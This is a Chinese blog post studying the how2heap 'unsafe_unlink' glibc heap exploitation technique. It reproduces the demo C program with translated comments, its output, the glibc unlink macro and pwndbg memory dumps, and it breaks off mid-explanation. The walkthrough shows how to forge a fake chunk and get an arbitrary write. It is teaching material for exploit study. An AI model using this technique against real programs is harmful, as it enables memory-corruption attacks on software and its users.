
<!DOCTYPE html>
<html lang="" class="loading">
<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>how2heap总结计划二 - 知世の小屋</title>
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate">
    <meta name="keywords" content="知世,"> 
    <meta name="description" content="my blogs,
假期坚决不咕咕咕之系列二!!系列一中我记录了first-fit,fastbin_dup,fastbin_dup_into_stack和fastbin_dup_consolidate四个文件的三种攻,"> 
    <meta name="author" content="知世"> 
    <link rel="alternative" href="atom.xml" title="知世の小屋" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">
    <link rel="stylesheet" href="/css/diaspora.css">
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <script>
         (adsbygoogle = window.adsbygoogle || []).push({
              google_ad_client: "ca-pub-8691406134231910",
              enable_page_level_ads: true
         });
    </script>
    <script async custom-element="amp-auto-ads" src="https://cdn.ampproject.org/v0/amp-auto-ads-0.1.js">
    </script>
</head>
</html>
<body class="loading">
    <span id="config-title" style="display:none">知世の小屋</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="icon-home image-icon" href="javascript:;" data-url="https://nightRainy.github.io"></a>
    <div title="播放/暂停" class="icon-play"></div>
    <h3 class="subtitle">how2heap总结计划二</h3>
    <div class="social">
        <!--<div class="like-icon">-->
            <!--<a href="javascript:;" class="likeThis active"><span class="icon-like"></span><span class="count">76</span></a>-->
        <!--</div>-->
        <div>
            <div class="share">
                <a title="获取二维码" class="icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class="main">
        <h1 class="title">how2heap总结计划二</h1>
        <div class="stuff">
            <span>一月 19, 2020</span>
            

        </div>
        <div class="content markdown">
            <blockquote>
<p>假期坚决不咕咕咕之系列二!!系列一中我记录了first-fit,fastbin_dup,fastbin_dup_into_stack和fastbin_dup_consolidate四个文件的三种攻击方式,那么这次就记录剩下的一些攻击方式叭!</p>
</blockquote>
<h1 id="参考网站"><a href="#参考网站" class="headerlink" title="参考网站"></a>参考网站</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/</span><br><span class="line">https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344\n\n</span><br><span class="line">http://blog.leanote.com/post/mut3p1g/how2heap</span><br><span class="line">https://xz.aliyun.com/t/2582#toc-5</span><br></pre></td></tr></table></figure>
<h1 id="环境"><a href="#环境" class="headerlink" title="环境"></a>环境</h1><p>buntu16.04,gdb(pwndbg)</p>
<h1 id="unsafe-unlink"><a href="#unsafe-unlink" class="headerlink" title="unsafe_unlink"></a>unsafe_unlink</h1><p>第一个就是经常会用到的一种技巧,unlink,下面我们先看源代码,同样的,我加了一小点注释并删了写作者的话</p>
<p>这里我觉得heap exploitation里的例子更容易理解一点23333,这是之前的一个<a href="https://nightrainy.github.io/2019/07/19/unlink-study/">总结</a></p>
<p>当然,不想跳转的小伙伴我也会对unlink做一下简单的介绍,具体的介绍我们调试着看:)</p>
<p>首先,什么是unlink?</p>
<p>所谓unlink就是为了取出双向链表中的一个chunk</p>
<p>那么什么时候需要取出双向链表中的chunk呢,也就是使用unlink的时机?</p>
<ul>
<li>malloc<ol>
<li>在恰好大小的large chunk处取chunk时</li>
<li>在比请求大小大的bin中取chunk时</li>
</ol>
</li>
<li>Free<ol>
<li>后向合并,合并物理相邻低物理地址空闲chunk时</li>
<li>前向合并,合并物理相邻高物理地址空闲chunk时(top chunk除外)</li>
</ol>
</li>
<li>malloc_consolidate<ol>
<li>后向合并,合并物理相邻低地址空闲chunk时。</li>
<li>前向合并，合并物理相邻高地址空闲 chunk时（top chunk除外）</li>
</ol>
</li>
<li>realloc<br>  前向扩展，合并物理相邻高地址空闲 chunk（除了top chunk）。</li>
</ul>
<p>攻击效果呢?</p>
<p>攻击效果就是 p处的指针会变为 p - 0x18;</p>
<p>好嘞下面我们回来,我删掉部分作者的话的大概意思:</p>
<p>请在ubuntu14.04和ubuntu16.04上测试,这个技巧运用在我们有一个已知区域的指针时,我们可以在这个指针上利用unlink这一技巧</p>
<p>最常见的情况就是出现在缓冲区上,这个缓冲区可能有溢出漏洞,或者上面有一个全局指针</p>
<p>好嘞我们直接看代码</p>
<h2 id="源代码"><a href="#源代码" class="headerlink" title="源代码"></a>源代码</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line">#include &lt;string.h&gt;</span><br><span class="line">#include &lt;stdint.h&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">uint64_t *chunk0_ptr;</span><br><span class="line"></span><br><span class="line">int main()</span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        int malloc_size = 0x80; //we want to be big enough not to use fastbins</span><br><span class="line">        int header_size = 2;</span><br><span class="line"></span><br><span class="line">        //本测试的重点就是利用free来破坏我们的全局chunk0_ptr以实现任意地址写</span><br><span class="line">        fprintf(stderr, &quot;The point of this exercise is to use free to corrupt the global chunk0_ptr to achieve arbitrary memory write.\n\n&quot;);</span><br><span class="line"></span><br><span class="line">        chunk0_ptr = (uint64_t*) malloc(malloc_size); //chunk0</span><br><span class="line">        uint64_t *chunk1_ptr  = (uint64_t*) malloc(malloc_size); //chunk1</span><br><span class="line"></span><br><span class="line">        //全局指针为chunk0_ptr,我们将要攻击的chunk为chunk1_ptr</span><br><span class="line">        fprintf(stderr, &quot;The global chunk0_ptr is at %p, pointing to %p\n&quot;, &amp;chunk0_ptr, chunk0_ptr);</span><br><span class="line">        fprintf(stderr, &quot;The victim chunk we are going to corrupt is at %p\n\n&quot;, chunk1_ptr);</span><br><span class="line">        </span><br><span class="line">        //我们要在chunk0中伪造一个chunk</span><br><span class="line">        fprintf(stderr, &quot;We create a fake chunk inside chunk0.\n&quot;);</span><br><span class="line"></span><br><span class="line">        //我们把我们的fake_chunk的fd指向我们的chunk0_ptr来满足P-&gt;FD-&gt;BK=P</span><br><span class="line">        fprintf(stderr, &quot;We setup the &apos;next_free_chunk&apos; (fd) of our fake chunk to point near to &amp;chunk0_ptr so that P-&gt;fd-&gt;bk = P.\n&quot;);</span><br><span class="line"></span><br><span class="line">        chunk0_ptr[2] = (uint64_t) &amp;chunk0_ptr-(sizeof(uint64_t)*3);</span><br><span class="line">        </span><br><span class="line">        //我们把fake_chunk的bk指针指向我们的chunk0_ptr来满足P-&gt;BK-&gt;FD</span><br><span class="line">        fprintf(stderr, &quot;We setup the &apos;previous_free_chunk&apos; (bk) of our fake chunk to point near to &amp;chunk0_ptr so that P-&gt;bk-&gt;fd = P.\n&quot;);</span><br><span class="line"></span><br><span class="line">        //通过这么设置,我们就可以成功bypass堆的检测即(P-&gt;FD-&gt;BK!=P||P-&gt;BK-&gt;FD!=P)==FALSE</span><br><span class="line">        fprintf(stderr, &quot;With this setup we can pass this check: (P-&gt;fd-&gt;bk != P || P-&gt;bk-&gt;fd != P) == False\n&quot;);</span><br><span class="line">        chunk0_ptr[3] = (uint64_t) &amp;chunk0_ptr-(sizeof(uint64_t)*2);</span><br><span class="line">        fprintf(stderr, &quot;Fake chunk fd: %p\n&quot;,(void*) chunk0_ptr[2]);</span><br><span class="line">        fprintf(stderr, &quot;Fake chunk bk: %p\n\n&quot;,(void*) chunk0_ptr[3]);</span><br><span class="line"></span><br><span class="line">        //我们假设我们可以通过溢出chunk0使得我们可以自由的更改chunk1的内容</span><br><span class="line">        fprintf(stderr, &quot;We assume that we have an overflow in chunk0 so that we can freely change chunk1 metadata.\n&quot;);</span><br><span class="line">        uint64_t *chunk1_hdr = chunk1_ptr - header_size;</span><br><span class="line"></span><br><span class="line">        //我们用chunk1的previous_size来收缩chunk0,让free认为我们的chunk0是在我们的伪造的chunk的地方开始的</span><br><span class="line">        fprintf(stderr, &quot;We shrink the size of chunk0 (saved as &apos;previous_size&apos; in chunk1) so that free will think that chunk0 starts where we placed our fake chunk.\n&quot;);</span><br><span class="line">        fprintf(stderr, &quot;It&apos;s important that our fake chunk begins exactly where the known pointer points and that we shrink the chunk accordingly\n&quot;);</span><br><span class="line">        chunk1_hdr[0] = malloc_size;</span><br><span class="line"></span><br><span class="line">        //如果我们正常的free chunk0,那么chunk1的pre_szie将是0x90,然而现在是一个新的值</span><br><span class="line">        fprintf(stderr, &quot;If we had &apos;normally&apos; freed chunk0, chunk1.previous_size would have been 0x90, however this is its new value: %p\n&quot;,(void*)chunk1_hdr[0]);</span><br><span class="line"></span><br><span class="line">        //我们通过将chunk1的pre_size设置为false,就可以将我们所伪造的chunk标记为free状态</span><br><span class="line">        fprintf(stderr, &quot;We mark our fake chunk as free by setting &apos;previous_in_use&apos; of chunk1 as False.\n\n&quot;);</span><br><span class="line">        chunk1_hdr[1] &amp;= ~1;</span><br><span class="line"></span><br><span class="line">        //现在我们free chunk1,这时发生向后合并将会unlink我们所伪造的chunk,从而覆写chunk0_ptr</span><br><span class="line">        fprintf(stderr, &quot;Now we free chunk1 so that consolidate backward will unlink our fake chunk, overwriting chunk0_ptr.\n&quot;);</span><br><span class="line">        fprintf(stderr, &quot;You can find the source of the unlink macro at https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344\n\n&quot;);</span><br><span class="line">        free(chunk1_ptr);</span><br><span class="line"></span><br><span class="line">        //在这个指针上,我们可以通过chunk0_ptr来覆写其自身以指向任意内存</span><br><span class="line">        fprintf(stderr, &quot;At this point we can use chunk0_ptr to overwrite itself to point to an arbitrary location.\n&quot;);</span><br><span class="line">        char victim_string[8];</span><br><span class="line">        strcpy(victim_string,&quot;Hello!~&quot;);</span><br><span class="line">        chunk0_ptr[3] = (uint64_t) victim_string;</span><br><span class="line"></span><br><span class="line">        //chunk0_ptr如今指向了我们想要的地方,我们可以用它来写我们的字符串了</span><br><span class="line">        fprintf(stderr, &quot;chunk0_ptr is now pointing where we want, we use it to overwrite our victim string.\n&quot;);</span><br><span class="line">        fprintf(stderr, &quot;Original value: %s\n&quot;,victim_string);</span><br><span class="line">        chunk0_ptr[0] = 0x4141414142424242LL;</span><br><span class="line">        fprintf(stderr, &quot;New Value: %s\n&quot;,victim_string);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h2 id="程序运行结果"><a href="#程序运行结果" class="headerlink" title="程序运行结果"></a>程序运行结果</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">The global chunk0_ptr is at 0x602070, pointing to 0x255b010</span><br><span class="line">The victim chunk we are going to corrupt is at 0x255b0a0</span><br><span class="line"></span><br><span class="line">We create a fake chunk inside chunk0.</span><br><span class="line">We setup the &apos;next_free_chunk&apos; (fd) of our fake chunk to point near to &amp;chunk0_ptr so that P-&gt;fd-&gt;bk = P.</span><br><span class="line">We setup the &apos;previous_free_chunk&apos; (bk) of our fake chunk to point near to &amp;chunk0_ptr so that P-&gt;bk-&gt;fd = P.</span><br><span class="line">With this setup we can pass this check: (P-&gt;fd-&gt;bk != P || P-&gt;bk-&gt;fd != P) == False</span><br><span class="line">Fake chunk fd: 0x602058</span><br><span class="line">Fake chunk bk: 0x602060</span><br><span class="line"></span><br><span class="line">We assume that we have an overflow in chunk0 so that we can freely change chunk1 metadata.</span><br><span class="line">We shrink the size of chunk0 (saved as &apos;previous_size&apos; in chunk1) so that free will think that chunk0 starts where we placed our fake chunk.</span><br><span class="line">It&apos;s important that our fake chunk begins exactly where the known pointer points and that we shrink the chunk accordingly</span><br><span class="line">If we had &apos;normally&apos; freed chunk0, chunk1.previous_size would have been 0x90, however this is its new value: 0x80</span><br><span class="line">We mark our fake chunk as free by setting &apos;previous_in_use&apos; of chunk1 as False.</span><br><span class="line"></span><br><span class="line">Now we free chunk1 so that consolidate backward will unlink our fake chunk, overwriting chunk0_ptr.</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">At this point we can use chunk0_ptr to overwrite itself to point to an arbitrary location.</span><br><span class="line">chunk0_ptr is now pointing where we want, we use it to overwrite our victim string.</span><br><span class="line">Original value: Hello!~</span><br><span class="line">New Value: BBBBAAAA</span><br></pre></td></tr></table></figure>
<h2 id="关键部分调试"><a href="#关键部分调试" class="headerlink" title="关键部分调试"></a>关键部分调试</h2><p>自己翻译的毛毛躁躁的,本来还大概知道是啥,结果看完有点懵,不过不要紧,我们根据源码上推荐的网站先把unlink部分代码拉过来</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">1344#define unlink(AV, P, BK, FD) &#123;                                            \</span><br><span class="line">1345     FD = P-&gt;fd;                                                               \</span><br><span class="line">1346     BK = P-&gt;bk;                                                               \</span><br><span class="line">1347     if (__builtin_expect (FD-&gt;bk != P || BK-&gt;fd != P, 0))                     \</span><br><span class="line">1348       malloc_printerr (check_action, &quot;corrupted double-linked list&quot;, P, AV);  \</span><br><span class="line">1349     else &#123;                                                                    \</span><br><span class="line">1350         FD-&gt;bk = BK;                                                          \</span><br><span class="line">1351         BK-&gt;fd = FD;                                                          \</span><br><span class="line">1352         if (!in_smallbin_range (P-&gt;size)                                      \</span><br><span class="line">1353             &amp;&amp; __builtin_expect (P-&gt;fd_nextsize != NULL, 0)) &#123;                \</span><br><span class="line">1354             if (__builtin_expect (P-&gt;fd_nextsize-&gt;bk_nextsize != P, 0)        \</span><br><span class="line">1355                 || __builtin_expect (P-&gt;bk_nextsize-&gt;fd_nextsize != P, 0))    \</span><br><span class="line">1356               malloc_printerr (check_action,                                  \</span><br><span class="line">1357                                &quot;corrupted double-linked list (not small)&quot;,    \</span><br><span class="line">1358                                P, AV);                                        \</span><br><span class="line">1359             if (FD-&gt;fd_nextsize == NULL) &#123;                                    \</span><br><span class="line">1360                 if (P-&gt;fd_nextsize == P)                                      \</span><br><span class="line">1361                   FD-&gt;fd_nextsize = FD-&gt;bk_nextsize = FD;                     \</span><br><span class="line">1362                 else &#123;                                                        \</span><br><span class="line">1363                     FD-&gt;fd_nextsize = P-&gt;fd_nextsize;                         \</span><br><span class="line">1364                     FD-&gt;bk_nextsize = P-&gt;bk_nextsize;                         \</span><br><span class="line">1365                     P-&gt;fd_nextsize-&gt;bk_nextsize = FD;                         \</span><br><span class="line">1366                     P-&gt;bk_nextsize-&gt;fd_nextsize = FD;                         \</span><br><span class="line">1367                   &#125;                                                           \</span><br><span class="line">1368               &#125; else &#123;                                                        \</span><br><span class="line">1369                 P-&gt;fd_nextsize-&gt;bk_nextsize = P-&gt;bk_nextsize;                 \</span><br><span class="line">1370                 P-&gt;bk_nextsize-&gt;fd_nextsize = P-&gt;fd_nextsize;                 \</span><br><span class="line">1371               &#125;                                                               \</span><br><span class="line">1372           &#125;                                                                   \</span><br><span class="line">1373       &#125;                                                                       \</span><br><span class="line">1374 &#125;</span><br></pre></td></tr></table></figure>
<p>这里我们最主要需要绕过的地方就是(FD-&gt;bk != P || BK-&gt;fd != P)这里了,我们根据函数传进来的东西解释一下<br>FD是我们所传进来的指针P的fd指针也就是FD=P-&gt;fd,而BK就是P-&gt;BK</p>
<p>也就是说,我们所需要满足的FD-&gt;bk=P,BK-&gt;fd=P其实就是</p>
<ol>
<li><p>P-&gt;fd-&gt;bk=P,即程序检测P的后一个空闲指针的前一个指针为P</p>
</li>
<li><p>P-&gt;bk-&gt;fd=P,同理检测P的前一个空闲指针的后一个指针为P</p>
</li>
</ol>
<p>如果我们想利用该怎么做呢?带着疑问让我们开始调试程序吧!</p>
<p>因为较为复杂,这里我下了8个断点,分别是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">► 21   chunk0_ptr = (uint64_t*) malloc(malloc_size); //chunk0</span><br><span class="line">  22   uint64_t *chunk1_ptr  = (uint64_t*) malloc(malloc_size); //chunk1</span><br><span class="line">► 27   fprintf(stderr, &quot;We setup the &apos;next_free_chunk&apos; (fd) of our fake chunk to point near to &amp;chunk0_ptr so that P-&gt;fd-&gt;bk = P.\n&quot;);</span><br><span class="line">  28   chunk0_ptr[2] = (uint64_t) &amp;chunk0_ptr-(sizeof(uint64_t)*3);</span><br><span class="line">► 31   chunk0_ptr[3] = (uint64_t) &amp;chunk0_ptr-(sizeof(uint64_t)*2);</span><br><span class="line">► 36   uint64_t *chunk1_hdr = chunk1_ptr - header_size;</span><br><span class="line">► 39   chunk1_hdr[0] = malloc_size;</span><br><span class="line">► 42   chunk1_hdr[1] &amp;= ~1;</span><br><span class="line"></span><br><span class="line">  50   strcpy(victim_string,&quot;Hello!~&quot;);</span><br><span class="line">► 51   chunk0_ptr[3] = (uint64_t) victim_string;</span><br><span class="line"></span><br><span class="line">  55   chunk0_ptr[0] = 0x4141414142424242LL;</span><br><span class="line">► 56   fprintf(stderr, &quot;New Value: %s\n&quot;,victim_string);</span><br></pre></td></tr></table></figure>
<p>首先是第一个断点的地方,也就是malloc chunk0的地方<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; heap</span><br><span class="line">0x603000 PREV_INUSE &#123;</span><br><span class="line">  prev_size = 0,</span><br><span class="line">  size = 145,</span><br><span class="line">  fd = 0x0,</span><br><span class="line">  bk = 0x0,</span><br><span class="line">  fd_nextsize = 0x0,</span><br><span class="line">  bk_nextsize = 0x0</span><br><span class="line">&#125;</span><br><span class="line">0x603090 PREV_INUSE &#123;</span><br><span class="line">  prev_size = 0,</span><br><span class="line">  size = 135025,</span><br><span class="line">  fd = 0x0,</span><br><span class="line">  bk = 0x0,</span><br><span class="line">  fd_nextsize = 0x0,</span><br><span class="line">  bk_nextsize = 0x0</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>可以看到我们已经有了一个堆块,那么下面我们单步走完下一个,即把chunk1也分配了,此时的堆块</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; heap</span><br><span class="line">0x603000 PREV_INUSE &#123;</span><br><span class="line">  prev_size = 0,</span><br><span class="line">  size = 0x91,</span><br><span class="line">  fd = 0x0,</span><br><span class="line">  bk = 0x0,</span><br><span class="line">  fd_nextsize = 0x0,</span><br><span class="line">  bk_nextsize = 0x0</span><br><span class="line">&#125;</span><br><span class="line">0x603090 PREV_INUSE &#123;</span><br><span class="line">  prev_size = 0,</span><br><span class="line">  size = 0x91,</span><br><span class="line">  fd = 0x0,</span><br><span class="line">  bk = 0x0,</span><br><span class="line">  fd_nextsize = 0x0,</span><br><span class="line">  bk_nextsize = 0x0</span><br><span class="line">&#125;</span><br><span class="line">0x603120 PREV_INUSE &#123;</span><br><span class="line">  prev_size = 0,</span><br><span class="line">  size = 134881,</span><br><span class="line">  fd = 0x0,</span><br><span class="line">  bk = 0x0,</span><br><span class="line">  fd_nextsize = 0x0,</span><br><span class="line">  bk_nextsize = 0x0</span><br><span class="line">&#125;</span><br><span class="line">pwndbg&gt;</span><br></pre></td></tr></table></figure>
<p>好嘞,我们到下一个断点处,没错,就是这个地方</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">► 28   chunk0_ptr[2] = (uint64_t) &amp;chunk0_ptr-(sizeof(uint64_t)*3);</span><br></pre></td></tr></table></figure>
<p>程序的注释中说我们将fake_chunk的fd指向我们的chunk0_ptr,我们先看看这个所谓的chunk0_ptr[2]是个什么东西:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; p/x chunk0_ptr</span><br><span class="line">$3 = 0x603010</span><br><span class="line">pwndbg&gt; p/x chunk0_ptr[2]</span><br><span class="line">$4 = 0x602058</span><br><span class="line">pwndbg&gt; p/x &amp;chunk0_ptr</span><br><span class="line">$5 = 0x602070</span><br><span class="line">pwndbg&gt; x/10x 0x602070</span><br><span class="line">0x602070 &lt;chunk0_ptr&gt;:  0x0000000000603010      0x0000000000000000</span><br><span class="line">0x602080:       0x0000000000000000      0x0000000000000000</span><br><span class="line">0x602090:       0x0000000000000000      0x0000000000000000</span><br><span class="line">0x6020a0:       0x0000000000000000      0x0000000000000000</span><br><span class="line">0x6020b0:       0x0000000000000000      0x0000000000000000</span><br><span class="line">pwndbg&gt; x/10gx 0x603010</span><br><span class="line">0x603010:       0x0000000000000000      0x0000000000000000</span><br><span class="line">0x603020:       0x0000000000602058      0x0000000000000000</span><br><span class="line">0x603030:       0x0000000000000000      0x0000000000000000</span><br><span class="line">0x603040:       0x0000000000000000      0x0000000000000000</span><br><span class="line">0x603050:       0x0000000000000000      0x0000000000000000</span><br></pre></td></tr></table></figure>
<p>为便于理解,这里我一共输出了五样东西</p>
<p>可以看到,程序将chunk0_ptr[2]的值变成了chunk0_ptr-0x18的地址</p>
<p>记得之前所说的吗,我们需要在chunk0中伪造一个fake chunk</p>
<p>我们的chunk0_ptr是从0x603000开始的,但是我们要清楚的是给用户的指针却是从0x603010开始的(这其实也是glibc的机制,这里就不详述了).结合程序注释,这也就意味着我们所伪造的fake chunk要从0x603010开始,以0x603020为fd指针,以0x603028为bk指针</p>
<p>此时我们的fd指针已经伪造好了,下面我们直接结束伪造bk指针的部分,此时的堆</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; heap</span><br><span class="line">0x603000 PREV_INUSE &#123;</span><br><span class="line">  prev_size = 0,</span><br><span class="line">  size = 145,</span><br><span class="line">  fd = 0x0,</span><br><span class="line">  bk = 0x0,</span><br><span class="line">  fd_nextsize = 0x602058,</span><br><span class="line">  bk_nextsize = 0x602060 &lt;stderr@@GLIBC_2.2.5&gt;</span><br><span class="line">&#125;</span><br><span class="line">0x603090 PREV_INUSE &#123;</span><br><span class="line">  prev_size = 0,</span><br><span class="line">  size = 145,</span><br><span class="line">  fd = 0x0,</span><br><span class="line">  bk = 0x0,</span><br><span class="line">  fd_nextsize = 0x0,</span><br><span class="line">  bk_nextsize = 0x0</span><br><span class="line">&#125;</span><br><span class="line">0x603120 PREV_INUSE &#123;</span><br><span class="line">  prev_size = 0,</span><br><span class="line">  size = 134881,</span><br><span class="line">  fd = 0x0,</span><br><span class="line">  bk = 0x0,</span><br><span class="line">  fd_nextsize = 0x0,</span><br><span class="line">  bk_nextsize = 0x0</span><br><span class="line">&#125;</span><br><span class="line">pwndbg&gt; x/10gx 0x603010</span><br><span class="line">0x603010:       0x0000000000000000      0x0000000000000000</span><br><span class="line">0x603020:       0x0000000000602058      0x0000000000602060</span><br><span class="line">0x603030:       0x0000000000000000      0x0000000000000000</span><br><span class="line">0x603040:       0x0000000000000000      0x0000000000000000</span><br><span class="line">0x603050:       0x0000000000000000      0x0000000000000000</span><br></pre></td></tr></table></figure>
<p>好了,此时我们已经成功的伪造了我们fake chunk的fd和bk指针,程序注释说我们这样就可以成功bypass那两个条件,也就是P-&gt;FD-&gt;BK=P&amp;&amp;P-&gt;BK-&gt;FD=P了,这是为什么呢?</p>
<p>我们现在假设我们的fake_chunk的size已经设好了,并且他的fd=0x602058,bk=0x602060,那么</p>
<p>fake_chunk-&gt;fd-&gt;bk是多少呢?我们看一下</p>
